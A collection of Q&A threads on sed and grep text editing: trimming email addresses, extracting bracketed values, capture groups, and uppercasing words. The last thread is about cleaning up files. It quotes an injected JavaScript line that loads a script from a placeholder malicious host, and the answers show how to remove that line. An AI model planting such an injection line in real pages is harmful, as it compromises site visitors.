Removing characters from text file in Linux

Removing characters from text file in Linux - sed

I've just joined SO after watching from the outside for just over a year now. The reason I've finally joined is because I could do with some help :)
I have a text file with a list of email addresses. The email addresses are in the following format:
<firstinitial><surname>#domain.com
I'd like to edit the text file so the output gives me:
<firstinitial><first3lettersofsurname>#domain.com
I've tried using sed, but can't seem to get this one. Any help would be much appreciated.
Many thanks,
Phill.

With GNU sed:
sed -E 's/(....).*(#.*)/\1\2/' file
.: matches any single character except newline
*: matches the preceding item zero or more times
\1: inserts the text matched by the first capturing group (....)
\2: inserts the text matched by the second capturing group (#.*)
See: The Stack Overflow Regular Expressions FAQ
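As a quick check, here is a minimal sketch of that command run against two made-up addresses (jsmith and pbrown are hypothetical; the # separator follows the format shown in the question):

```shell
# Hypothetical sample input; real data would come from the text file.
shortened=$(printf '%s\n' 'jsmith#domain.com' 'pbrown#domain.com' |
  sed -E 's/(....).*(#.*)/\1\2/')
printf '%s\n' "$shortened"
# Prints:
# jsmi#domain.com
# pbro#domain.com
```

A line with fewer than four characters before the # does not match the pattern, so sed leaves it unchanged.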

Related

Extracting substring from inside bracketed string, where the substring may have spaces

I've got an application that has no useful API implemented, and the only way to get certain information is to parse string output. This is proving to be very painful...
I'm trying to achieve this in bash on SLES12.
Given I have the following strings:
QMNAME(QMTKGW01) STATUS(Running)
QMNAME(QMTKGW01) STATUS(Ended normally)
I want to extract the STATUS value, i.e. "Ended normally" or "Running".
Note that the line structure can move around, so I can't count on the "STATUS" being the second field.
The closest I have managed to get so far is to extract a single word from inside STATUS like so
echo "QMNAME(QMTKGW01) STATUS(Running)" | sed "s/^.*STATUS(\(\S*\)).*/\1/"
This works for "Running" but not for "Ended normally"
I've tried switching the \S* for [\S\s]* in both "grep -o" and "sed" but it seems to corrupt the entire regex.

This is purely a regex issue. \S matches only non-whitespace characters, so \S* inside the parentheses cannot match a value that contains a space, such as "Ended normally". Keep it simple by spelling out the characters allowed inside the parentheses: [a-zA-Z ]*, i.e. zero or more upper- or lower-case letters and spaces.
sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'
Or use the character class [:alnum:] if you want digits too:
sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'

sed 's/.*STATUS(\([^)]*\)).*/\1/' file
Output:
Running
Ended normally
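To see that this does not depend on field order, here is a small sketch with the fields swapped in the second line (the swapped line is an invented example, not output from the real application):

```shell
# The second line is hypothetical: same fields as the question, reversed.
status=$(printf '%s\n' \
  'QMNAME(QMTKGW01) STATUS(Running)' \
  'STATUS(Ended normally) QMNAME(QMTKGW01)' |
  sed 's/.*STATUS(\([^)]*\)).*/\1/')
printf '%s\n' "$status"
# Prints:
# Running
# Ended normally
```

Because [^)]* accepts anything up to the closing parenthesis, spaces inside the value are not a problem.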

Extracting a substring matching a given pattern is a job for grep, not sed. We should use sed when we must edit the input string. (A lot of people use sed and even awk just to extract substrings, but that's wasteful in my opinion.)
So, here is a grep solution. We need to make some assumptions (in any solution) about your input - some are easy to relax, others are not. In your example the word STATUS is always capitalized, and it is immediately followed by the opening parenthesis (no space, no colon etc.). These assumptions can be relaxed easily. More importantly, and not easy to work around: there are no nested parentheses. You will want the longest substring of non-closing-parenthesis characters following the opening parenthesis, no matter what they are.
With these assumptions:
$ grep -oP '\bSTATUS\(\K[^)]*(?=\))' << EOF
> QMNAME(QMTKGW01) STATUS(Running)
> QMNAME(QMTKGW01) STATUS(Ended normally)
> EOF
Running
Ended normally
Explanation:
Command options: o to return only the matched substring; P to use Perl extensions (the \K marker and the lookahead). The regexp: we look for a word boundary (\b) - so the word STATUS is a complete word, not part of a longer word like SUBSTATUS; then the word STATUS and opening parenthesis. This is required for a match, but \K instructs that this part of the matched string will not be returned in the output. Then we seek zero or more non-closing-parenthesis characters ([^)]*) and we require that this be followed by a closing parenthesis - but the closing parenthesis is also not included in the returned string. That's a "lookahead" (the (?= ... ) construct).
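The effect of the word boundary can be sketched as follows, assuming a grep built with PCRE support (GNU grep usually is). SUBSTATUS(...) is a hypothetical field invented for this illustration:

```shell
# \b stops the pattern from matching the STATUS inside SUBSTATUS.
value=$(printf '%s\n' 'SUBSTATUS(Idle) STATUS(Ended normally)' |
  grep -oP '\bSTATUS\(\K[^)]*(?=\))')
printf '%s\n' "$value"
# Prints:
# Ended normally
```

Without the \b, grep -o would also report Idle on a line of its own.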

Changing a character in between patterns in vi/sed

I am struggling to work out how to get a , out from in between various patterns such as:
500,000
xyz ,CA
I have tried something like:
sed -E "s/\([a-zA-Z]*\),([a-zA-Z]*\)/\([a-zA-Z]*\) ([a-zA-Z]*\)/g" $file -i
It picks up the first pattern but then overwrites it with the second pattern. I feel like I am missing something very simple and I can't work it out; any help is really appreciated.

You're missing the notion of capture groups, I think. To refer to a parenthesized portion of the search within the replacement string, use \1 for the first group, \2 for the second group, etc.
The modified line would be:
sed -E -i "s/([a-zA-Z]),([a-zA-Z])/\1 \2/g" "$file"
Rather than replacing the part that matches the first ([a-zA-Z]) with the literal text "([a-zA-Z])", this modified line just copies the matched portion into the output (and likewise for the second group).
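A minimal sketch of the backreferences in action, using made-up input and printing to standard output instead of editing a file in place:

```shell
# Made-up sample lines: only a comma directly between two letters is replaced.
fixed=$(printf '%s\n' 'Austin,TX' '500,000' |
  sed -E 's/([a-zA-Z]),([a-zA-Z])/\1 \2/g')
printf '%s\n' "$fixed"
# Prints:
# Austin TX
# 500,000
```

Since both groups accept letters only, the 500,000 and xyz ,CA samples from the question are left untouched; covering those would need wider character classes, which is a separate decision from the capture-group fix.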

Invalid reference \1 using sed when trying to print matching expression

Before I start, I already looked at this question, but it seems the solution was that they were not escaping the parentheses in their regex. I'm getting the same error, but I'm not grouping a regex. What I want to do is find all names/usernames in a lastlog file and return the UNs ONLY.
What I have:
s/^[a-z]+ |^[a-z]+[0-9]+/\1/p
I've seen many solutions that show how to do it in awk, which is great for future reference, but I want to do it using sed.
Edit for example input:
dzhu pts/15 n0000d174.cs.uts Wed Feb 17 08:31:22 -0600 2016
krobbins **Never logged in**
js24 **Never logged in**

You cannot use backreferences (such as \1) if you do not have any capture groups in the first part of your substitution command.
Assuming you want the first word in the line, here's a command you can run:
sed -n 's/^\s*\(\w\+\)\s\?.*/\1/p'
Explanation:
-n suppresses the default behavior of sed to print each line it processes
^\s* matches the start of the line followed by any amount of whitespace
\(\w\+\) captures one or more word characters (letters, digits, and underscores)
\s\?.* matches zero or one whitespace character, followed by any number of characters. This makes the pattern consume the rest of the line, so only the captured word remains after the substitution
\1 replaces the matched line with the captured group
The p flag prints lines that matched the expression. Combined with -n, this means only matches get printed out.
I hope this helps!
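Here is a short sketch that feeds the three example lines from the question through that command. It assumes GNU sed, since \s, \w, \+ and \? are GNU extensions to basic regular expressions:

```shell
# Sample lines copied from the question's example input.
users=$(printf '%s\n' \
  'dzhu pts/15 n0000d174.cs.uts Wed Feb 17 08:31:22 -0600 2016' \
  'krobbins **Never logged in**' \
  'js24 **Never logged in**' |
  sed -n 's/^\s*\(\w\+\)\s\?.*/\1/p')
printf '%s\n' "$users"
# Prints:
# dzhu
# krobbins
# js24
```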

Using sed to convert singular/plural words into uppercase

Using one sed command I'm trying to convert all occurrences of test and tests found in a .txt file into all caps. I also want to print only the converted lines, so I'm using -n. I've been playing around with it for over an hour. The problem is that I'm able to convert one or the other (either test or tests) but not both.
Any help would be so greatly appreciated. Thank you!

Use this
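sed -n -e 's/tests/TESTS/g; s/test/TEST/g; T; p' input.txt
The semicolons let you execute multiple commands. T (a GNU extension) skips to the next line when neither substitution matched, so p prints only the converted lines; -n suppresses the default output so those lines are not printed twice.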

This might work for you (GNU sed):
sed 's/\<tests\?\>/\U&/gp;d' file
This uppercases whole words (\<...\>) that consist of test followed by an optional s (s\?).
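A small sketch of that one-liner on invented input, assuming GNU sed (\<, \>, \? and \U are GNU extensions):

```shell
# Invented sample lines; "contest" is there to show the word boundary at work.
converted=$(printf '%s\n' \
  'run the test' \
  'nothing to change' \
  'all tests pass in contest' |
  sed 's/\<tests\?\>/\U&/gp;d')
printf '%s\n' "$converted"
# Prints:
# run the TEST
# all TESTS pass in contest
```

The p flag prints a line only when a substitution happened, and d then discards the pattern space, so unmatched lines never reach the output.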

Sorry for the late response, but here is hopefully an understandable one with basic regex (no extended regex):
sed 's:\<test\(s*\)\>:TEST\U\1:g' < inputFile.txt > outputFile.txt; grep -n TEST outputFile.txt
Explanation:
: delimiter (instead of the usual /)
\<test\> matches test. The character before the first t can be any character except a letter, number or underscore. The same applies to the character after the last t.
\(\) remembers what is inside the parentheses.
s* matches zero or more s's.
\1 inserts the first remembered match (i.e. any number of s's matched).
\U (GNU sed) uppercases what follows in the replacement, so the remembered s's come out as S; without it, tests would become TESTs.
The rest is hopefully clear. Otherwise leave a comment.

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js

You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashes and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be treated literally. For example, in the context address \xabc\xdefx, the RE delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
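The range delete can be tried safely on a stream before touching any files. This is a minimal sketch in which the surrounding var lines and the document.write placeholder are invented for illustration:

```shell
# Invented sample: two legitimate lines around the injected block.
cleaned=$(printf '%s\n' \
  'var a = 1;' \
  '/*123456*/' \
  'document.write("placeholder");' \
  '' \
  '/*/123456*/' \
  'var b = 2;' |
  sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d')
printf '%s\n' "$cleaned"
# Prints:
# var a = 1;
# var b = 2;
```

Everything from the opening comment through the closing comment is removed, including the empty line in between.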
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.
